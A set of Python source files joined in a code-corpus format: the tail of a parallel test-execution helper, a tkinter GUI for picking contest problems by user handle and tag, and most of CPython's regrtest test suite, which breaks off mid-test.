errors = [e for e in errors if e is not None]
if len(errors) > 1:
# In multi-errors situations, print all of them
for rank, _, exc_info in errors:
print(f"\nERROR ON RANK={rank}:", file=sys.stderr)
traceback.print_exception(*exc_info)
print(file=sys.stderr)
if errors:
# Reraise just the first exception.
_, e, _ = errors[0]
raise e
return results
@property
def rank(self) -> int:
"""
Only callable within an @Execution.run-wrapped function.
Use the thread identifier to figure out what the rank is for the caller, and return the
rank of that caller.
This is syntactic sugar to avoid having to write a large number of functions that take
parameters of (rank, cross_rank, local_rank).
"""
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._info[thread_id][0]
@property
def cross_rank(self) -> int:
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._info[thread_id][1]
@property
def local_rank(self) -> int:
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._info[thread_id][2]
@property
def distributed(self) -> core.DistributedContext:
assert self._dist is not None, "Execute was configured make_distributed_context=False"
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._dist[self.rank]
@contextlib.contextmanager
def raises_when(pred: bool, *args: Any, **kwargs: Any) -> Iterator[None]:
"""
A wrapper around pytest.raises that has a handy predicate argument.
Useful in @parallel.Execution.run-wrapped functions.
Example usage:
with parallel.Execution(2) as pex:
@pex.run
def all_workers_fn():
with raises_when(pex.rank!=0, AssertionError):
assert pex.rank == 0
"""
if not pred:
yield
return
with pytest.raises(*args, **kwargs):
yield
|
gui.py
|
import tkinter as tk
from tkinter import Entry
from inter import *
import threading
class gui:
def __init__(self):
self.root = tk.Tk()
self.root.title('Problem Picker')
self.inter = inter(self)
self.buttons={}
self.labels ={}
self.tags =set()
self.tagoption = tk.IntVar()
self.filteroption = tk.IntVar()
self.row=1
self.handles = set()
self.handle = tk.StringVar()
self.root.geometry('600x500')
self.root.bg='white'
self.handleLabel = tk.Label(self.root,text = 'Enter handle',font ='console 10 bold')
self.handleLabel.grid(row = 1, column = 1,columnspan = 2)
self.handleEntryfunc()
self.addHandleButtonfun()
self.problemsbutton = tk.Button(self.root,text = "choose porblems" ,font ='console 10 bold',command = self.chooseproblems)
self.problemsbutton.grid(row = 2,column = 2,padx=10,pady=5)
tk.Button(self.root,text='Load last handles',command=self.loadlasthandles).grid(row=3,column=2,pady=5,padx=10)
tk.Button(self.root,text='update the base',command=self.updatebase).grid(row=4,column=2,pady=5,padx=10)
self.lastbasetime = tk.Label(self.root,text = f'last update on : {self.inter.basetime}')
self.lastbasetime.grid(row=5,column=2,pady=5,padx=10)
self.root.mainloop()
def handleEntryfunc(self):
self.handleEntry = tk.Entry(self.root,textvariable = self.handle)
self.handleEntry.delete(0,100)
self.handleEntry.grid(row = 1,column = 5 , columnspan = 5,padx = 10)
self.handleEntry.config(width = 20)
def addHandleButtonfun(self):
self.addHandleButton = tk.Button(self.root,text = 'Add Handle',font = 'console 10 bold',command = self.addhandlefun)
button = self.addHandleButton
button.grid(row=1,column = 10,padx = 10)
def addhandlefun(self):
handle = self.handle.get()
self.handle.set('')
if not(handle in self.handles):
self.handles.add(handle)
self.row+=1
row = self.row
label = tk.Label(self.root,text = handle,font = 'console 10 bold')
button = tk.Button(self.root,text = 'remove',command = lambda row=row:self.remove(row))
label.grid(column=10,row = row,padx =10,pady = 5)
button.grid(column=13,row=row,padx = 10)
self.buttons[row] = button
self.labels[row] = label
# self.lables[]
print(self.buttons)
def remove(self,row):
labelref = self.labels[row]
butref = self.buttons[row]
butref.config(bg = 'red',text = 'removed',command = lambda row=row:self.reinsert(row) )
self.handles.remove(labelref.cget('text'))
print(self.handles)
def reinsert(self,row):
labelref = self.labels[row]
butref = self.buttons[row]
butref.config(bg = 'white',text = 'remove',command = lambda row=row:self.remove(row) )
self.handles.add(labelref.cget('text'))
print(self.handles)
def loadlasthandles(self):
handles = self.inter.loadlast(self.inter.handlesfile)
for handle in handles:
self.handle.set(handle)
self.addhandlefun()
def updatebase(self):
self.inter.updatebase()
self.lastbasetime.config(text=f'last update on : {self.inter.basetime}')
def chooseproblems(self):
print(self.handles)
self.inter.picklelast(self.inter.handlesfile,self.handles)
self.inter.connectthreading(self.handles)
self.pr = tk.Tk()
self.pr.title('Problem Picker')
self.pr.geometry('600x500')
self.rendertags()
self.rendertagsoptions()
self.renderfilteroptions()
self.rendersubmit()
# self.renderloadlasttags()
self.pr.mainloop()
def rendertags(self):
row = 0
col =0
tags = list(self.inter.gettags())
self.tagboxes = {}
tags.sort()
for tag in tags :
check = tk.Checkbutton(self.pr,text = tag)
check.grid(row = row//2,column = col%2)
check.config(justify='left',width = 10,anchor = "w",command = lambda tag=tag:self.updatetags(tag))
row+=1
col+=1
self.tagboxes[tag] = check
def rendertagsoptions(self): #for some reason this method wasn't working the way it's suppose to, so i made a hack around .
tk.Label(self.pr,text='Problems must contain',font = 'console 10 bold').grid(row = 0,column=10,columnspan=4)
tk.Radiobutton(self.pr,text='only These tags',value=1,variable = self.tagoption,anchor = 'w',command = lambda :self.hacktag(1)).grid(row=1,column = 10,padx = 10)
tk.Radiobutton(self.pr,text='some of These tags',value=2,variable = self.tagoption,anchor = 'w',command= lambda :self.hacktag(2)).grid(row=2,column = 10,padx = 10)
tk.Radiobutton(self.pr,text='All of These tags',value=3,variable = self.tagoption,anchor = 'w',command = lambda :self.hacktag(3)).grid(row=3,column =10,padx = 10)
def renderfilteroptions(self):
tk.Label(self.pr,text='Filter by',font = 'console 10 bold').grid(row = 5,column=10,columnspan=4)
tk.Radiobutton(self.pr,text='not Submitted by the contestants',variable = self.filteroption,value=1,anchor = 'w',command = lambda :self.hackfilter(1)).grid(row=6,column = 10,padx = 10)
tk.Radiobutton(self.pr,text='not Accepted by the contestants',variable = self.filteroption,value=2,anchor = 'w',command = lambda :self.hackfilter(2)).grid(row=7,column = 10,padx = 10)
def rendersubmit(self):
but = tk.Button(self.pr,text = 'Submit',font = 'console 10 bold')
but.config(command = self.submit,width = 7)
but.grid(row = 9,column=10,padx = 3)
self.submitButton = but
self.submitsate()
def submitsate(self):
def statethread():
while self.inter.thread.isAlive():
self.submitButton.config(state="disabled")
self.submitButton.config(state="normal")
threading.Thread(target = statethread).start()
def hacktag(self,num):
self.tagoption.set(num)
def hackfilter(self,num):
self.filteroption.set(num)
def renderloadlasttags(self):
but = tk.Button(self.pr,text = 'load last tags',command = self.loadlasttags)
but.grid(row = 11,column = 4)
def loadlasttags(self):
self.tags = self.inter.loadlast(self.inter.tagsfile)
for tag in self.tagboxes:
if tag in self.tags:
self.tagboxes[tag].invoke()
def updatetags(self,tag):
if tag in self.tags:
self.tags.remove(tag)
else:
self.tags.add(tag)
def submit(self):
# self.inter.org=False
print(self.tags)
self.inter.picklelast(self.inter.tagsfile,self.tags)
self.inter.submit()
tk.Label(self.pr,text='problems wrote to problems.txt',font ='console 10 bold' ).grid(row = 10,column = 10,padx=10,pady=10)
gui()
|
test_regrtest.py
|
"""
Tests of regrtest.py.
Note: test_regrtest cannot be run twice in parallel.
"""
import contextlib
import glob
import io
import os.path
import platform
import re
import subprocess
import sys
import sysconfig
import tempfile
import textwrap
import time
import unittest
from test import libregrtest
from test import support
from test.support import os_helper
from test.libregrtest import utils, setup
if not support.has_subprocess_support:
raise unittest.SkipTest("test module requires subprocess")
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
ROOT_DIR = os.path.join(os.path.dirname(__file__), '..', '..')
ROOT_DIR = os.path.abspath(os.path.normpath(ROOT_DIR))
LOG_PREFIX = r'[0-9]+:[0-9]+:[0-9]+ (?:load avg: [0-9]+\.[0-9]{2} )?'
TEST_INTERRUPTED = textwrap.dedent("""
from signal import SIGINT, raise_signal
try:
raise_signal(SIGINT)
except ImportError:
import os
os.kill(os.getpid(), SIGINT)
""")
class ParseArgsTestCase(unittest.TestCase):
"""
Test regrtest's argument parsing, function _parse_args().
"""
def checkError(self, args, msg):
with support.captured_stderr() as err, self.assertRaises(SystemExit):
libregrtest._parse_args(args)
self.assertIn(msg, err.getvalue())
def test_help(self):
for opt in '-h', '--help':
with self.subTest(opt=opt):
with support.captured_stdout() as out, \
self.assertRaises(SystemExit):
libregrtest._parse_args([opt])
self.assertIn('Run Python regression tests.', out.getvalue())
def test_timeout(self):
ns = libregrtest._parse_args(['--timeout', '4.2'])
self.assertEqual(ns.timeout, 4.2)
self.checkError(['--timeout'], 'expected one argument')
self.checkError(['--timeout', 'foo'], 'invalid float value')
def test_wait(self):
ns = libregrtest._parse_args(['--wait'])
self.assertTrue(ns.wait)
def test_worker_args(self):
ns = libregrtest._parse_args(['--worker-args', '[[], {}]'])
self.assertEqual(ns.worker_args, '[[], {}]')
self.checkError(['--worker-args'], 'expected one argument')
def test_start(self):
for opt in '-S', '--start':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.start, 'foo')
self.checkError([opt], 'expected one argument')
def test_verbose(self):
ns = libregrtest._parse_args(['-v'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['-vvv'])
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args(['--verbose'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['--verbose'] * 3)
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args([])
self.assertEqual(ns.verbose, 0)
def test_verbose2(self):
for opt in '-w', '--verbose2':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose2)
def test_verbose3(self):
for opt in '-W', '--verbose3':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose3)
def test_quiet(self):
for opt in '-q', '--quiet':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_slowest(self):
for opt in '-o', '--slowest':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.print_slow)
def test_header(self):
ns = libregrtest._parse_args(['--header'])
self.assertTrue(ns.header)
ns = libregrtest._parse_args(['--verbose'])
self.assertTrue(ns.header)
def test_randomize(self):
for opt in '-r', '--randomize':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.randomize)
def test_randseed(self):
ns = libregrtest._parse_args(['--randseed', '12345'])
self.assertEqual(ns.random_seed, 12345)
self.assertTrue(ns.randomize)
self.checkError(['--randseed'], 'expected one argument')
self.checkError(['--randseed', 'foo'], 'invalid int value')
def test_fromfile(self):
for opt in '-f', '--fromfile':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.fromfile, 'foo')
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo', '-s'], "don't go together")
def test_exclude(self):
for opt in '-x', '--exclude':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.exclude)
def test_single(self):
for opt in '-s', '--single':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.single)
self.checkError([opt, '-f', 'foo'], "don't go together")
def test_ignore(self):
for opt in '-i', '--ignore':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.ignore_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--ignorefile', filename])
self.assertEqual(ns.ignore_tests,
['matchfile1', 'matchfile2'])
def test_match(self):
for opt in '-m', '--match':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.match_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
ns = libregrtest._parse_args(['-m', 'pattern1',
'-m', 'pattern2'])
self.assertEqual(ns.match_tests, ['pattern1', 'pattern2'])
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--matchfile', filename])
self.assertEqual(ns.match_tests,
['match', 'matchfile1', 'matchfile2'])
def test_failfast(self):
for opt in '-G', '--failfast':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '-v'])
self.assertTrue(ns.failfast)
ns = libregrtest._parse_args([opt, '-W'])
self.assertTrue(ns.failfast)
self.checkError([opt], '-G/--failfast needs either -v or -W')
def test_use(self):
for opt in '-u', '--use':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'gui,network'])
self.assertEqual(ns.use_resources, ['gui', 'network'])
ns = libregrtest._parse_args([opt, 'gui,none,network'])
self.assertEqual(ns.use_resources, ['network'])
expected = list(libregrtest.ALL_RESOURCES)
expected.remove('gui')
ns = libregrtest._parse_args([opt, 'all,-gui'])
self.assertEqual(ns.use_resources, expected)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid resource')
# all + a resource not part of "all"
ns = libregrtest._parse_args([opt, 'all,tzdata'])
self.assertEqual(ns.use_resources,
list(libregrtest.ALL_RESOURCES) + ['tzdata'])
# test another resource which is not part of "all"
ns = libregrtest._parse_args([opt, 'extralargefile'])
self.assertEqual(ns.use_resources, ['extralargefile'])
def test_memlimit(self):
for opt in '-M', '--memlimit':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '4G'])
self.assertEqual(ns.memlimit, '4G')
self.checkError([opt], 'expected one argument')
def test_testdir(self):
ns = libregrtest._parse_args(['--testdir', 'foo'])
self.assertEqual(ns.testdir, os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError(['--testdir'], 'expected one argument')
def test_runleaks(self):
for opt in '-L', '--runleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.runleaks)
def test_huntrleaks(self):
for opt in '-R', '--huntrleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, ':'])
self.assertEqual(ns.huntrleaks, (5, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:'])
self.assertEqual(ns.huntrleaks, (6, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, ':3'])
self.assertEqual(ns.huntrleaks, (5, 3, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:3:leaks.log'])
self.assertEqual(ns.huntrleaks, (6, 3, 'leaks.log'))
self.checkError([opt], 'expected one argument')
self.checkError([opt, '6'],
'needs 2 or 3 colon-separated arguments')
self.checkError([opt, 'foo:'], 'invalid huntrleaks value')
self.checkError([opt, '6:foo'], 'invalid huntrleaks value')
def test_multiprocess(self):
for opt in '-j', '--multiprocess':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '2'])
self.assertEqual(ns.use_mp, 2)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
self.checkError([opt, '2', '-T'], "don't go together")
self.checkError([opt, '0', '-T'], "don't go together")
def test_coverage(self):
for opt in '-T', '--coverage':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.trace)
def test_coverdir(self):
for opt in '-D', '--coverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.coverdir,
os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError([opt], 'expected one argument')
def test_nocoverdir(self):
for opt in '-N', '--nocoverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertIsNone(ns.coverdir)
def test_threshold(self):
for opt in '-t', '--threshold':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '1000'])
self.assertEqual(ns.threshold, 1000)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
def test_nowindows(self):
for opt in '-n', '--nowindows':
with self.subTest(opt=opt):
with contextlib.redirect_stderr(io.StringIO()) as stderr:
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.nowindows)
err = stderr.getvalue()
self.assertIn('the --nowindows (-n) option is deprecated', err)
def test_forever(self):
for opt in '-F', '--forever':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.forever)
def test_unrecognized_argument(self):
self.checkError(['--xxx'], 'usage:')
def test_long_option__partial(self):
ns = libregrtest._parse_args(['--qui'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_two_options(self):
ns = libregrtest._parse_args(['--quiet', '--exclude'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertTrue(ns.exclude)
def test_option_with_empty_string_value(self):
ns = libregrtest._parse_args(['--start', ''])
self.assertEqual(ns.start, '')
def test_arg(self):
ns = libregrtest._parse_args(['foo'])
self.assertEqual(ns.args, ['foo'])
def test_option_and_arg(self):
ns = libregrtest._parse_args(['--quiet', 'foo'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertEqual(ns.args, ['foo'])
def test_arg_option_arg(self):
ns = libregrtest._parse_args(['test_unaryop', '-v', 'test_binop'])
self.assertEqual(ns.verbose, 1)
self.assertEqual(ns.args, ['test_unaryop', 'test_binop'])
def test_unknown_option(self):
self.checkError(['--unknown-option'],
'unrecognized arguments: --unknown-option')
class BaseTestCase(unittest.TestCase):
TEST_UNIQUE_ID = 1
TESTNAME_PREFIX = 'test_regrtest_'
TESTNAME_REGEX = r'test_[a-zA-Z0-9_]+'
def setUp(self):
self.testdir = os.path.realpath(os.path.dirname(__file__))
self.tmptestdir = tempfile.mkdtemp()
self.addCleanup(os_helper.rmtree, self.tmptestdir)
def create_test(self, name=None, code=None):
if not name:
name = 'noop%s' % BaseTestCase.TEST_UNIQUE_ID
BaseTestCase.TEST_UNIQUE_ID += 1
if code is None:
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_empty_test(self):
pass
""")
# test_regrtest cannot be run twice in parallel because
# of setUp() and create_test()
name = self.TESTNAME_PREFIX + name
path = os.path.join(self.tmptestdir, name + '.py')
self.addCleanup(os_helper.unlink, path)
# Use 'x' mode to ensure that we do not override existing tests
try:
with open(path, 'x', encoding='utf-8') as fp:
fp.write(code)
except PermissionError as exc:
if not sysconfig.is_python_build():
self.skipTest("cannot write %s: %s" % (path, exc))
raise
return name
def regex_search(self, regex, output):
match = re.search(regex, output, re.MULTILINE)
if not match:
self.fail("%r not found in %r" % (regex, output))
return match
def check_line(self, output, regex):
regex = re.compile(r'^' + regex, re.MULTILINE)
self.assertRegex(output, regex)
def parse_executed_tests(self, output):
regex = (r'^%s\[ *[0-9]+(?:/ *[0-9]+)*\] (%s)'
% (LOG_PREFIX, self.TESTNAME_REGEX))
parser = re.finditer(regex, output, re.MULTILINE)
return list(match.group(1) for match in parser)
def check_executed_tests(self, output, tests, skipped=(), failed=(),
env_changed=(), omitted=(),
rerun={}, no_test_ran=(),
randomize=False, interrupted=False,
fail_env_changed=False):
if isinstance(tests, str):
tests = [tests]
if isinstance(skipped, str):
skipped = [skipped]
if isinstance(failed, str):
failed = [failed]
if isinstance(env_changed, str):
env_changed = [env_changed]
if isinstance(omitted, str):
omitted = [omitted]
if isinstance(no_test_ran, str):
no_test_ran = [no_test_ran]
executed = self.parse_executed_tests(output)
if randomize:
self.assertEqual(set(executed), set(tests), output)
else:
self.assertEqual(executed, tests, output)
def plural(count):
return 's' if count != 1 else ''
def list_regex(line_format, tests):
count = len(tests)
names = ' '.join(sorted(tests))
regex = line_format % (count, plural(count))
regex = r'%s:\n %s$' % (regex, names)
return regex
if skipped:
regex = list_regex('%s test%s skipped', skipped)
self.check_line(output, regex)
if failed:
regex = list_regex('%s test%s failed', failed)
self.check_line(output, regex)
if env_changed:
regex = list_regex('%s test%s altered the execution environment',
env_changed)
self.check_line(output, regex)
if omitted:
regex = list_regex('%s test%s omitted', omitted)
self.check_line(output, regex)
if rerun:
regex = list_regex('%s re-run test%s', rerun.keys())
self.check_line(output, regex)
regex = LOG_PREFIX + r"Re-running failed tests in verbose mode"
self.check_line(output, regex)
for name, match in rerun.items():
regex = LOG_PREFIX + f"Re-running {name} in verbose mode \\(matching: {match}\\)"
self.check_line(output, regex)
if no_test_ran:
regex = list_regex('%s test%s run no tests', no_test_ran)
self.check_line(output, regex)
good = (len(tests) - len(skipped) - len(failed)
- len(omitted) - len(env_changed) - len(no_test_ran))
if good:
regex = r'%s test%s OK\.$' % (good, plural(good))
if not skipped and not failed and good > 1:
regex = 'All %s' % regex
self.check_line(output, regex)
if interrupted:
self.check_line(output, 'Test suite interrupted by signal SIGINT.')
result = []
if failed:
result.append('FAILURE')
elif fail_env_changed and env_changed:
result.append('ENV CHANGED')
if interrupted:
result.append('INTERRUPTED')
if not any((good, result, failed, interrupted, skipped,
env_changed, fail_env_changed)):
result.append("NO TEST RUN")
elif not result:
result.append('SUCCESS')
result = ', '.join(result)
if rerun:
self.check_line(output, 'Tests result: FAILURE')
result = 'FAILURE then %s' % result
self.check_line(output, 'Tests result: %s' % result)
def parse_random_seed(self, output):
match = self.regex_search(r'Using random seed ([0-9]+)', output)
randseed = int(match.group(1))
self.assertTrue(0 <= randseed <= 10000000, randseed)
return randseed
def run_command(self, args, input=None, exitcode=0, **kw):
if not input:
input = ''
if 'stderr' not in kw:
kw['stderr'] = subprocess.STDOUT
proc = subprocess.run(args,
universal_newlines=True,
input=input,
stdout=subprocess.PIPE,
**kw)
if proc.returncode != exitcode:
msg = ("Command %s failed with exit code %s\n"
"\n"
"stdout:\n"
"---\n"
"%s\n"
"---\n"
% (str(args), proc.returncode, proc.stdout))
if proc.stderr:
msg += ("\n"
"stderr:\n"
"---\n"
"%s"
"---\n"
% proc.stderr)
self.fail(msg)
return proc
def run_python(self, args, **kw):
args = [sys.executable, '-X', 'faulthandler', '-I', *args]
proc = self.run_command(args, **kw)
return proc.stdout
class CheckActualTests(BaseTestCase):
def test_finds_expected_number_of_tests(self):
"""
Check that regrtest appears to find the expected set of tests.
"""
args = ['-Wd', '-E', '-bb', '-m', 'test.regrtest', '--list-tests']
output = self.run_python(args)
rough_number_of_tests_found = len(output.splitlines())
actual_testsuite_glob = os.path.join(glob.escape(os.path.dirname(__file__)),
'test*.py')
rough_counted_test_py_files = len(glob.glob(actual_testsuite_glob))
# We're not trying to duplicate test finding logic in here,
# just give a rough estimate of how many there should be and
# be near that. This is a regression test to prevent mishaps
# such as https://bugs.python.org/issue37667 in the future.
# If you need to change the values in here during some
# mythical future test suite reorganization, don't go
# overboard with logic and keep that goal in mind.
self.assertGreater(rough_number_of_tests_found,
rough_counted_test_py_files*9//10,
msg='Unexpectedly low number of tests found in:\n'
f'{", ".join(output.splitlines())}')
class ProgramsTestCase(BaseTestCase):
"""
Test various ways to run the Python test suite. Use options close
to options used on the buildbot.
"""
NTEST = 4
def setUp(self):
super().setUp()
# Create NTEST tests doing nothing
self.tests = [self.create_test() for index in range(self.NTEST)]
self.python_args = ['-Wd', '-E', '-bb']
self.regrtest_args = ['-uall', '-rwW',
'--testdir=%s' % self.tmptestdir]
self.regrtest_args.extend(('--timeout', '3600', '-j4'))
if sys.platform == 'win32':
self.regrtest_args.append('-n')
def check_output(self, output):
self.parse_random_seed(output)
self.check_executed_tests(output, self.tests, randomize=True)
def run_tests(self, args):
output = self.run_python(args)
self.check_output(output)
def test_script_regrtest(self):
# Lib/test/regrtest.py
script = os.path.join(self.testdir, 'regrtest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_test(self):
# -m test
args = [*self.python_args, '-m', 'test',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_regrtest(self):
# -m test.regrtest
args = [*self.python_args, '-m', 'test.regrtest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_autotest(self):
# -m test.autotest
args = [*self.python_args, '-m', 'test.autotest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_from_test_autotest(self):
# from test import autotest
code = 'from test import autotest'
args = [*self.python_args, '-c', code,
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_script_autotest(self):
# Lib/test/autotest.py
script = os.path.join(self.testdir, 'autotest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
@unittest.skipUnless(sysconfig.is_python_build(),
'run_tests.py script is not installed')
def test_tools_script_run_tests(self):
# Tools/scripts/run_tests.py
script = os.path.join(ROOT_DIR, 'Tools', 'scripts', 'run_tests.py')
args = [script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def run_batch(self, *args):
proc = self.run_command(args)
self.check_output(proc.stdout)
@unittest.skipUnless(sysconfig.is_python_build(),
'test.bat script is not installed')
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_tools_buildbot_test(self):
# Tools\buildbot\test.bat
script = os.path.join(ROOT_DIR, 'Tools', 'buildbot', 'test.bat')
test_args = ['--testdir=%s' % self.tmptestdir]
if platform.machine() == 'ARM64':
test_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
test_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
test_args.append('-x64') # 64-bit build
if not Py_DEBUG:
test_args.append('+d') # Release build, use python.exe
self.run_batch(script, *test_args, *self.tests)
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_pcbuild_rt(self):
# PCbuild\rt.bat
script = os.path.join(ROOT_DIR, r'PCbuild\rt.bat')
if not os.path.isfile(script):
self.skipTest(f'File "{script}" does not exist')
rt_args = ["-q"] # Quick, don't run tests twice
if platform.machine() == 'ARM64':
rt_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
rt_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
rt_args.append('-x64') # 64-bit build
if Py_DEBUG:
rt_args.append('-d') # Debug build, use python_d.exe
self.run_batch(script, *rt_args, *self.regrtest_args, *self.tests)
class ArgsTestCase(BaseTestCase):
"""
Test arguments of the Python test suite.
"""
def run_tests(self, *testargs, **kw):
cmdargs = ['-m', 'test', '--testdir=%s' % self.tmptestdir, *testargs]
return self.run_python(cmdargs, **kw)
def test_failing_test(self):
# test a failing test
code = textwrap.dedent("""
import unittest
class FailingTest(unittest.TestCase):
def test_failing(self):
self.fail("bug")
""")
test_ok = self.create_test('ok')
test_failing = self.create_test('failing', code=code)
tests = [test_ok, test_failing]
output = self.run_tests(*tests, exitcode=2)
self.check_executed_tests(output, tests, failed=test_failing)
def test_resources(self):
# test -u command line option
tests = {}
for resource in ('audio', 'network'):
code = textwrap.dedent("""
from test import support; support.requires(%r)
import unittest
class PassingTest(unittest.TestCase):
def test_pass(self):
pass
""" % resource)
tests[resource] = self.create_test(resource, code)
test_names = sorted(tests.values())
# -u all: 2 resources enabled
output = self.run_tests('-u', 'all', *test_names)
self.check_executed_tests(output, test_names)
# -u audio: 1 resource enabled
output = self.run_tests('-uaudio', *test_names)
self.check_executed_tests(output, test_names,
skipped=tests['network'])
# no option: 0 resources enabled
output = self.run_tests(*test_names)
self.check_executed_tests(output, test_names,
skipped=test_names)
def test_random(self):
# test -r and --randseed command line option
code = textwrap.dedent("""
import random
print("TESTRANDOM: %s" % random.randint(1, 1000))
""")
test = self.create_test('random', code)
# first run to get the output with the random seed
output = self.run_tests('-r', test)
randseed = self.parse_random_seed(output)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random = int(match.group(1))
# try to reproduce with the random seed
output = self.run_tests('-r', '--randseed=%s' % randseed, test)
randseed2 = self.parse_random_seed(output)
self.assertEqual(randseed2, randseed)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random2 = int(match.group(1))
self.assertEqual(test_random2, test_random)
def test_fromfile(self):
# test --fromfile
tests = [self.create_test() for index in range(5)]
# Write the list of files using a format similar to regrtest output:
# [1/2] test_1
# [2/2] test_2
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
# test format '0:00:00 [2/7] test_opcodes -- test_grammar took 0 sec'
with open(filename, "w") as fp:
previous = None
for index, name in enumerate(tests, 1):
line = ("00:00:%02i [%s/%s] %s"
% (index, index, len(tests), name))
if previous:
line += " -- %s took 0 sec" % previous
print(line, file=fp)
previous = name
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format '[2/7] test_opcodes'
with open(filename, "w") as fp:
for index, name in enumerate(tests, 1):
print("[%s/%s] %s" % (index, len(tests), name), file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'test_opcodes'
with open(filename, "w") as fp:
for name in tests:
print(name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'Lib/test/test_opcodes.py'
with open(filename, "w") as fp:
for name in tests:
print('Lib/test/%s.py' % name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
def test_interrupted(self):
code = TEST_INTERRUPTED
test = self.create_test('sigint', code=code)
output = self.run_tests(test, exitcode=130)
self.check_executed_tests(output, test, omitted=test,
interrupted=True)
def test_slowest(self):
# test --slowest
tests = [self.create_test() for index in range(3)]
output = self.run_tests("--slowest", *tests)
self.check_executed_tests(output, tests)
regex = ('10 slowest tests:\n'
'(?:- %s: .*\n){%s}'
% (self.TESTNAME_REGEX, len(tests)))
self.check_line(output, regex)
def test_slowest_interrupted(self):
# Issue #25373: test --slowest with an interrupted test
code = TEST_INTERRUPTED
test = self.create_test("sigint", code=code)
for multiprocessing in (False, True):
with self.subTest(multiprocessing=multiprocessing):
if multiprocessing:
